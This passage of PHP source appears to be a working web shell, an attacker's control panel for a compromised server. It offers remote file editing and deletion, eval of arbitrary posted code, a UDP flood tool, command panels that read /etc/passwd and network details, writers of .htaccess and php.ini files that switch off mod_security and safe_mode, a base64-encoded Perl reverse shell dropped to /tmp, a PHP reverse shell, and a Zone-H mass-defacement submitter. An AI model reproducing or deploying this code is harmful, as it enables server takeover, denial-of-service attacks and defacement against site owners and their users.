 625                        else
 626                            @unlink($item);
 627                    }
 628                    closedir($dh);
 629                    @rmdir($path);
 630                }
 631                if(is_dir(@$_POST['p2']))
 632                deleteDir(@$_POST['p2']);
 633                else
 634                @unlink(@$_POST['p2']);
 635                break;
 636        default:
 637                 if(!empty($_POST['p1'])) {
 638                    $_SESSION['act'] = @$_POST['p1'];
 639                    $_SESSION['f'] = @$_POST['f'];
 640                    foreach($_SESSION['f'] as $k => $f)
 641                        $_SESSION['f'][$k] = urldecode($f);
 642                    $_SESSION['c'] = @$_POST['c'];
 643                }
 644                break;
 645        }
 646    }
 647    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
 648    if($dirContent === false) {   echo '<h3><span>|  Access Denied! |</span></h3></div>';madFooter(); return; }
 649    global $sort;
 650    $sort = array('name', 1);
 651    if(!empty($_POST['p1'])) {
 652        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
 653            $sort = array($match[1], (int)$match[2]);
 654    }
 655 echo "
 656 <table width='100%' class='main' cellspacing='0' cellpadding='2'  >
 657 <form name=files method=post><tr><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
 658    $dirs = $files = array();
 659    $n = count($dirContent);
 660    for($i=0;$i<$n;$i++) {
 661        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
 662        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
 663        $tmp = array('name' => $dirContent[$i],
 664                     'path' => $GLOBALS['cwd'].$dirContent[$i],
 665                     'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
 666                     'perms' => madPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
 667                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
 668                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
 669                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
 670                    );
 671        if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
 672            $files[] = array_merge($tmp, array('type' => 'file'));
 673        elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
 674            $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
 675        elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
 676            $dirs[] = array_merge($tmp, array('type' => 'dir'));
 677    }
 678    $GLOBALS['sort'] = $sort;
 679    function wsoCmp($a, $b) {
 680        if($GLOBALS['sort'][0] != 'size')
 681            return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
 682        else
 683            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
 684    }
 685    usort($files, "wsoCmp");
 686    usort($dirs, "wsoCmp");
 687    $files = array_merge($dirs, $files);
 688    $l = 0;
 689    foreach($files as $f) {
 690        echo '<tr'.($l?' class=l1':'').'><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td><td>'.(($f['type']=='file')?madSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
 691            .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'<a href="#" onclick="g(\'FilesMan\',null,\'delete\', \''.urlencode($f['name']).'\')"> X </a></td></tr>';
 692        $l = $l?0:1;
 693    }
 694    echo "<tr><td colspan=7>
 695   <input type=hidden name=a value='FilesMan'>
 696   <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
 697   <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
 698   </form></table></div>";
 699 
 700    
 701     madfooter();
 702  }
 703     
 704   function madFilesTools() {
 705    if( isset($_POST['p1']) )
 706        $_POST['p1'] = urldecode($_POST['p1']);
 707    if(@$_POST['p2']=='download') {
 708        if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
 709            ob_start("ob_gzhandler", 4096);
 710            header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
 711            if (function_exists("mime_content_type")) {
 712                $type = @mime_content_type($_POST['p1']);
 713                header("Content-Type: " . $type);
 714            } else
 715                 header("Content-Type: application/octet-stream");
 716            $fp = @fopen($_POST['p1'], "r");
 717            if($fp) {
 718                while(!@feof($fp))
 719                    echo @fread($fp, 1024);
 720                fclose($fp);
 721            }
 722        }exit;
 723    }
 724    if( @$_POST['p2'] == 'mkfile' ) {
 725        if(!file_exists($_POST['p1'])) {
 726            $fp = @fopen($_POST['p1'], 'w');
 727            if($fp) {
 728                $_POST['p2'] = "edit";
 729                fclose($fp);
 730            }
 731        }
 732    }
 733    
 734    madhead();
 735    echo '<div class=header>';
 736    if( !file_exists(@$_POST['p1']) ) {
 737        echo "<pre class=ml1 style='margin-top:5px'>FILE DOEST NOT EXITS </pre></div>";
 738        madFooter();
 739        return;
 740    }
 741    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
 742    if(!$uid) {
 743        $uid['name'] = @fileowner($_POST['p1']);
 744        $gid['name'] = @filegroup($_POST['p1']);
 745    } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
 746    echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?madSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.madPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
 747    echo '<br>';
 748    if( empty($_POST['p2']) )
 749        $_POST['p2'] = 'view';
 750    if( is_file($_POST['p1']) )
 751        $m = array('View', 'Highlight', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch');
 752    else
 753        $m = array('Chmod', 'Rename', 'Touch');
 754    foreach($m as $v)
 755        echo '<a  href=# onclick="g(null,null,null,\''.strtolower($v).'\')"><span>'.((strtolower($v)==@$_POST['p2'])?'<b><span> '.$v.' </span> </b>':$v).' </span></a> ';
 756    echo '<br><br>';
 757    switch($_POST['p2']) {
 758        case 'view':
 759            echo '<pre class=ml1>';
 760            $fp = @fopen($_POST['p1'], 'r');
 761            if($fp) {
 762                while( !@feof($fp) )
 763                    echo htmlspecialchars(@fread($fp, 1024));
 764                @fclose($fp);
 765            }
 766            echo '</pre>';
 767            break;
 768        case 'highlight':
 769            if( @is_readable($_POST['p1']) ) {
 770                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
 771                $code = @highlight_file($_POST['p1'],true);
 772                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
 773            }
 774            break;
 775        case 'chmod':
 776            if( !empty($_POST['p3']) ) {
 777                $perms = 0;
 778                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
 779                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
 780                if(!@chmod($_POST['p1'], $perms))
 781                    echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
 782            }
 783            clearstatcache();
 784            echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
 785            break;
 786        case 'edit':
 787            if( !is_writable($_POST['p1'])) {
 788                echo 'File isn\'t writeable';
 789                break;
 790            }
 791            if( !empty($_POST['p3']) ) {
 792                $time = @filemtime($_POST['p1']);
 793                $_POST['p3'] = substr($_POST['p3'],1);
 794                $fp = @fopen($_POST['p1'],"w");
 795                if($fp) {
 796                    @fwrite($fp,$_POST['p3']);
 797                    @fclose($fp);
 798                    echo 'Saved!<br><script>p3_="";</script>';
 799                    @touch($_POST['p1'],$time,$time);
 800                }
 801            }
 802            echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
 803            $fp = @fopen($_POST['p1'], 'r');
 804            if($fp) {
 805                while( !@feof($fp) )
 806                    echo htmlspecialchars(@fread($fp, 1024));
 807                @fclose($fp);
 808            }
 809            echo '</textarea><input type=submit value=">>"></form>';
 810            break;
 811        case 'hexdump':
 812            $c = @file_get_contents($_POST['p1']);
 813            $n = 0;
 814            $h = array('00000000<br>','','');
 815            $len = strlen($c);
 816            for ($i=0; $i<$len; ++$i) {
 817                $h[1] .= sprintf('%02X',ord($c[$i])).' ';
 818                switch ( ord($c[$i]) ) {
 819                    case 0:  $h[2] .= ' '; break;
 820                    case 9:  $h[2] .= ' '; break;
 821                    case 10: $h[2] .= ' '; break;
 822                    case 13: $h[2] .= ' '; break;
 823                    default: $h[2] .= $c[$i]; break;
 824                }
 825                $n++;
 826                if ($n == 32) {
 827                    $n = 0;
 828                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
 829                    $h[1] .= '<br>';
 830                    $h[2] .= "\n";
 831                }
 832            }
 833            echo '<table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
 834            break;
 835        case 'rename':
 836            if( !empty($_POST['p3']) ) {
 837                if(!@rename($_POST['p1'], $_POST['p3']))
 838                    echo 'Can\'t rename!<br>';
 839                else
 840                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
 841            }
 842            echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
 843            break;
 844        case 'touch':
 845            if( !empty($_POST['p3']) ) {
 846                $time = strtotime($_POST['p3']);
 847                if($time) {
 848                    if(!touch($_POST['p1'],$time,$time))
 849                        echo 'Fail!';
 850                    else
 851                        echo 'Touched!';
 852                } else echo 'Bad time format!';
 853            }
 854            clearstatcache();
 855            echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
 856            break;
 857    }
 858    echo '</div>';
 859    madFooter();
 860 }  
 861 
 862 function madphpeval()
 863 {
 864     madhead();
 865     
 866     if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) {
 867        echo '<div class=header>';
 868        ob_start();
 869        $INI=ini_get_all(); 
 870 print '<table border=0><tr>'
 871    .'<td class="listing"><font class="highlight_txt">Param</td>'
 872    .'<td class="listing"><font class="highlight_txt">Global value</td>'
 873    .'<td class="listing"><font class="highlight_txt">Local Value</td>'
 874    .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
 875 foreach ($INI as $param => $values) 
 876    print "\n".'<tr>'
 877        .'<td class="listing"><b>'.$param.'</td>'
 878        .'<td class="listing">'.$values['global_value'].' </td>'
 879        .'<td class="listing">'.$values['local_value'].' </td>'
 880        .'<td class="listing">'.$values['access'].' </td></tr>';
 881        $tmp = ob_get_clean();
 882         $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
 883        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
 884        echo str_replace('<h1','<h2', $tmp) .'</div><br>';
 885    }
 886     
 887     if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
 888        echo '<div class=header><style>.p {color:#000;}</style>';
 889        ob_start();
 890        phpinfo();
 891        $tmp = ob_get_clean();
 892         $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
 893        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
 894        echo str_replace('<h1','<h2', $tmp) .'</div><br>';
 895    }
 896     
 897     if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) {
 898        echo '<div class=header>';
 899        ob_start();
 900         $EXT=get_loaded_extensions ();
 901      print '<table border=0><tr><td class="listing">'
 902    .implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT)
 903    .'</td></tr></table>'
 904    .count($EXT).' extensions loaded';
 905        
 906         
 907         echo '</div><br>';
 908    }
 909     
 910     
 911    if(empty($_POST['ajax']) && !empty($_POST['p1']))
 912        $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
 913     echo '<div class=header><Center><a href=# onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=# onclick="g(\'phpeval\',null,\'\',\'info\')">    | phpinfo |</a><a href=# onclick="g(\'phpeval\',null,\'\',\'exten\')">   | extensions  |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,\'\'); return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><center><input type=submit value=Eval style="margin-top:5px"></center>';
 914    echo '</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
 915    if(!empty($_POST['p1'])) {
 916        ob_start();
 917        eval($_POST['p1']);
 918        echo htmlspecialchars(ob_get_clean());
 919    }
 920    echo '</pre></div>';
 921   
 922     madfooter();
 923 }
 924 
 925 function madhash()
 926 {
 927     if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
 928     if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
 929    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
 930    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
 931    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
 932    $stringTools = array(
 933        'Base64 encode' => 'base64_encode',
 934        'Base64 decode' => 'base64_decode',
 935         'md5 hash' => 'md5',
 936        'sha1 hash' => 'sha1',
 937        'crypt' => 'crypt',
 938        'CRC32' => 'crc32',
 939        'Url encode' => 'urlencode',
 940        'Url decode' => 'urldecode',
 941        'Full urlencode' => 'full_urlencode',
 942        'Htmlspecialchars' => 'htmlspecialchars',
 943        
 944    );
 945    
 946    madhead();
 947    echo '<div class=header>';
 948    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 949        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 950    echo "<form  onSubmit='g(null,null,this.selectTool.value,this.input.value); return false;'><select name='selectTool'>";
 951    foreach($stringTools as $k => $v)
 952        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
 953        echo "</select><input type='submit' value='>>'/><br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
 954    if(!empty($_POST['p1'])) {
 955        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
 956    }
 957    echo "</div>";
 958    madFooter();
 959     
 960 }
 961 function maddos()
 962 {
 963     madhead();
 964     echo '<div class=header>';
 965   if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 966   $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 967   echo '<center><span>| UDP DOSSIER |</span><br><br><form onSubmit="g(null,null,this.udphost.value,this.udptime.value,this.udpport.value); return false;" method=POST><span>Host :</span><input name="udphost" type="text"  size="25" /><span>Time :</span><input name="udptime" type="text" size="15" /><span>Port :</span><input name="udpport" type="text" size="10" /><input  type="submit" value=">>" /></form></center>';
 968   echo "<pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' >";
 969     if(!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3']))
 970     {
 971          $packets=0;
 972         ignore_user_abort(true);
 973         $exec_time=$_POST['p2'];
 974         $time=time();
 975         $max_time=$exec_time+$time;
 976         $host=$_POST['p1'];
 977         $portudp=$_POST['p3'];
 978         for($i=0;$i<65000;$i++)
 979         {
 980             $out .= 'X';
 981         }
 982         while(1){
 983     
 984          $packets++;
 985             if(time() > $max_time){
 986                     break;
 987             }
 988             
 989             $fp = fsockopen('udp://'.$host, $portudp, $errno, $errstr, 5);
 990             if($fp){
 991                     fwrite($fp, $out);
 992                     fclose($fp);
 993             }
 994             }
 995          echo "$packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second";
 996          echo "</pre>";
 997     }
 998     
 999     echo '</div>'; 
1000    
1001     madfooter();        
1002 }
1003 
1004 function madproc()
1005 {
1006     madhead();
1007     echo "<Div class=header><center>";
1008     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1009   $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1010   if($GLOBALS['sys']=="win")
1011   {
1012     $process=array(
1013     "System Info" =>"systeminfo",
1014     "Active Connections" => "netstat -an",
1015    "Running Services" => "net start",
1016    "User Accounts" => "net user",
1017    "Show Computers" => "net view",
1018     "ARP Table" => "arp -a",
1019     "IP Configuration" => "ipconfig /all"
1020     );
1021     }
1022   else
1023   { 
1024     $process=array(
1025     "Process status" => "ps aux",
1026     "Syslog" =>"cat  /etc/syslog.conf",
1027     "Resolv" => "cat  /etc/resolv.conf",
1028     "Hosts" =>"cat /etc/hosts",
1029     "Passwd" =>"cat /etc/passwd",
1030     "Cpuinfo"=>"cat /proc/cpuinfo",
1031     "Version"=>"cat /proc/version",
1032     "Sbin"=>"ls -al /usr/sbin",
1033     "Interrupts"=>"cat /proc/interrupts",
1034     "lsattr"=>"lsattr -va",
1035     "Uptime"=>"uptime",
1036     "Fstab" =>"cat /etc/fstab",
1037     "HDD Space" => "df -h"
1038     );}
1039     
1040     foreach($process as $n => $link)
1041     {
1042         echo '<a href="#" onclick="g(null,null,\''.$link.'\')"> | '.$n.' | </a>';
1043     }
1044     echo "</center>"; 
1045      if(!empty($_POST['p1']))
1046      {
1047         echo "<pre class='ml1' style='margin-top:5px' >";
1048         echo madEx($_POST['p1']);
1049         echo '</pre>';
1050      }
1051      echo "</div>";
1052      madfooter();
1053      }
1054      
1055 function madsafe()
1056 {
1057     madhead();
1058     echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh  ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br>";
1059     echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
1060     if(!empty($_POST['p2']) && isset($_POST['p2']))
1061     {
1062     $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1063     fwrite($fil,'<IfModule mod_security.c>
1064 Sec------Engine Off
1065 Sec------ScanPOST Off
1066 </IfModule>');
1067     fclose($fil);
1068    }
1069    if(!empty($_POST['p1'])&& isset($_POST['p1']))
1070    {
1071     $fil=fopen($GLOBALS['cwd']."php.ini","w");
1072       fwrite($fil,'safe_mode=OFF
1073 disable_functions=NONE');
1074      fclose($fil);
1075     }
1076     if(!empty($_POST['p3']) && isset($_POST['p3']))
1077     {
1078     $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1079     fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
1080 AddType application/x-httpd-cgi .sh
1081 AddHandler cgi-script .pl
1082 AddHandler cgi-script .pl');
1083      fclose($fil); 
1084     }
1085     echo "<br></div>";
1086     madfooter();
1087     
1088 }
1089 
1090 function madconnect()
1091 {
1092  madhead();
1093  $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1094  echo "<div class=header><center><h3><span>| PERL AND PHP(threads) BACK CONNECT |</span></h3>";
1095  echo "<form  onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"><span>PERL BACK CONNECT</span><br>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form>";
1096  echo "<br><form  onSubmit=\"g(null,null,'php',this.server.value,this.port.value);return false;\"><span>PHP BACK CONNECT</span><br>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></center>";
1097  if(isset($_POST['p1'])) {
1098        function cf($f,$t) {
1099            $w = @fopen($f,"w") or @function_exists('file_put_contents');
1100            if($w){
1101                @fwrite($w,@base64_decode($t));
1102                @fclose($w);
1103            }
1104        }
1105        if($_POST['p1'] == 'bcp') {
1106            cf("/tmp/bc.pl",$back_connect_p);
1107            $out = madEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
1108            echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to ".$_POST['p2'].":".$_POST['p3']."<br>Connecting...</pre>";
1109             @unlink("/tmp/bc.pl");
1110        }
1111         if($_POST['p1']=='php')
1112  {
1113             
1114 @set_time_limit (0);
1115 $ip = $_POST['p2']; 
1116 $port =$_POST['p3'];     
1117 $chunk_size = 1400;
1118 $write_a = null;
1119 $error_a = null;
1120 $shell = 'uname -a; w; id; /bin/sh -i';
1121 $daemon = 0;
1122 $debug = 0;
1123 echo "<pre class=ml1 style='margin-top:5px'>";
1124 
1125 if (function_exists('pcntl_fork')) {
1126    
1127    $pid = pcntl_fork();
1128    
1129    if ($pid == -1) {
1130        echo "Cant fork!<br>";
1131        exit(1);
1132    }
1133    
1134    if ($pid) {
1135        exit(0);  
1136    }
1137 
1138    if (posix_setsid() == -1) {
1139        echo "Error: Can't setsid()<br>";
1140        exit(1);
1141    }
1142 
1143    $daemon = 1;
1144 } else {
1145    echo "WARNING: Failed to daemonise.  This is quite common and not fatal<br>";
1146 }
1147 
1148 chdir("/");
1149 
1150 umask(0);
1151 
1152 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
1153 if (!$sock) {
1154    echo "$errstr ($errno)";
1155    exit(1);
1156 }
1157 
1158 
1159 $descriptorspec = array(
1160    0 => array("pipe", "r"),  
1161    1 => array("pipe", "w"),  
1162    2 => array("pipe", "w")   
1163 );
1164 
1165 $process = proc_open($shell, $descriptorspec, $pipes);
1166 
1167 if (!is_resource($process)) {
1168    echo "ERROR: Can't spawn shell<br>";
1169    exit(1);
1170 }
1171 
1172 
1173 @stream_set_blocking($pipes[0], 0);
1174 @stream_set_blocking($pipes[1], 0);
1175 @stream_set_blocking($pipes[2], 0);
1176 @stream_set_blocking($sock, 0);
1177 
1178 echo "Successfully opened reverse shell to $ip:$port<br>";
1179 
1180 while (1) {
1181    if (feof($sock)) {
1182        echo "ERROR: Shell connection terminated<br>";
1183        break;
1184    }
1185 
1186    if (feof($pipes[1])) {
1187        echo "ERROR: Shell process terminated<br>";
1188        break;
1189    }
1190 
1191    
1192    $read_a = array($sock, $pipes[1], $pipes[2]);
1193    $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null);
1194 
1195    if (in_array($sock, $read_a)) {
1196        if ($debug) echo "SOCK READ<br>";
1197        $input=fread($sock, $chunk_size);
1198        if ($debug) echo "SOCK: $input<br>";
1199        fwrite($pipes[0], $input);
1200    }
1201 
1202    if (in_array($pipes[1], $read_a)) {
1203        if ($debug) echo "STDOUT READ<br>";
1204        $input = fread($pipes[1], $chunk_size);
1205        if ($debug) echo "STDOUT: $input<br>";
1206        fwrite($sock, $input);
1207    }
1208 
1209    
1210    if (in_array($pipes[2], $read_a)) {
1211        if ($debug) echo "STDERR READ<br>";
1212        $input = fread($pipes[2], $chunk_size);
1213        if ($debug) echo "STDERR: $input<br>";
1214        fwrite($sock, $input);
1215    }
1216 }
1217 
1218 fclose($sock);
1219 fclose($pipes[0]);
1220 fclose($pipes[1]);
1221 fclose($pipes[2]);
1222 proc_close($process);
1223 
1224 echo "</pre>";
1225 }
1226 
1227 }   
1228  echo "</div>";
1229  madfooter();
1230 }
1231 function ZoneH($url, $hacker, $hackmode,$reson, $site )
1232 {
1233    $k = curl_init();
1234    curl_setopt($k, CURLOPT_URL, $url);
1235    curl_setopt($k,CURLOPT_POST,true);
1236    curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
1237    curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
1238    curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
1239    $kubra = curl_exec($k);
1240    curl_close($k);
1241    return $kubra;
1242 }
1243 function madzoneh()
1244 {
1245     madhead();
1246     if(!function_exists('curl_version'))
1247     {
1248         echo "<pre class=ml1 style='margin-top:5px'><center><font color=red>PHP CURL NOT EXIT</font></center></pre>";
1249     }
1250     echo "<div class=header><center><br>";
1251     echo '<h3><span>|ZONE-H MASS DEFACER |</span></h3>
1252     <form  onSubmit="g(null,null,this.defacer.value,this.hackmode.value,this.domain.value);return false;" >
1253     <span>| Notifier |</span><br>
1254 <input type="text" name=defacer size="40" value="Attacker" /><br>
1255 <select name=hackmode>
1256 <option >--------SELECT--------</option>
1257 <option value="1">known vulnerability (i.e. unpatched system)</option>
1258 <option value="2" >undisclosed (new) vulnerability</option>
1259 <option value="3" >configuration / admin. mistake</option>
1260 <option value="4" >brute force attack</option>
1261 <option value="5" >social engineering</option>
1262 <option value="6" >Web Server intrusion</option>
1263 <option value="7" >Web Server external module intrusion</option>
1264 <option value="8" >Mail Server intrusion</option>
1265 <option value="9" >FTP Server intrusion</option>
1266 <option value="10" >SSH Server intrusion</option>
1267 <option value="11" >Telnet Server intrusion</option>
1268 <option value="12" >RPC Server intrusion</option>
1269 <option value="13" >Shares misconfiguration</option>
1270 <option value="14" >Other Server intrusion</option>
1271 <option value="15" >SQL Injection</option>
1272 <option value="16" >URL Poisoning</option>
1273 <option value="17" >File Inclusion</option>
1274 <option value="18" >Other Web Application bug</option>
1275 <option value="19" >Remote administrative panel access bruteforcing</option>
1276 <option value="20" >Remote administrative panel access password guessing</option>
1277 <option value="21" >Remote administrative panel access social engineering</option>
1278 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
1279 <option value="23" >Access credentials through Man In the Middle attack</option>
1280 <option value="24" >Remote service password guessing</option>
1281 <option value="25" >Remote service password bruteforce</option>
1282 <option value="26" >Rerouting after attacking the Firewall</option>
1283 <option value="27" >Rerouting after attacking the Router</option>
1284 <option value="28" >DNS attack through social engineering</option>
1285 <option value="29" >DNS attack through cache poisoning</option>
1286 <option value="30" >Not available</option>
1287 </select><br>
1288 <select  >
1289 <option >Not available</option>
1290 <option value="1" >Heh...just for fun!</option>
1291 <option value="2" >Revenge against that website</option>
1292 <option value="3" >Political reasons</option>
1293 <option value="4" >As a challenge</option>
1294 <option value="5" >I just want to be the best defacer</option>
1295 <option value="6" >Patriotism</option>
1296 <option value="7" >Not available</option>
1297 </select><br>
1298 <textarea name=domain cols="50" rows="15">List Of Domains</textarea>
1299 <br>
1300 <input type="submit" value=">>" /></form>';
1301 if(isset($_POST['p1']) && isset($_POST['p2']))
1302 {
1303     $hacker =$_POST['p1'];
1304     $method =$_POST['p2'];
1305     $neden ="Not available";
1306     $site =$_POST['p3'];
1307    $i = 0;
1308    $sites = explode("\n", $site);
1309    echo "<pre class=ml1 style='margin-top:5px'>";
1310    while($i < count($sites)) 
1311    {
1312    if(substr($sites[$i], 0, 4) != "http") 
1313    {
1314            $sites[$i] = "http://".$sites[$i];
1315    }
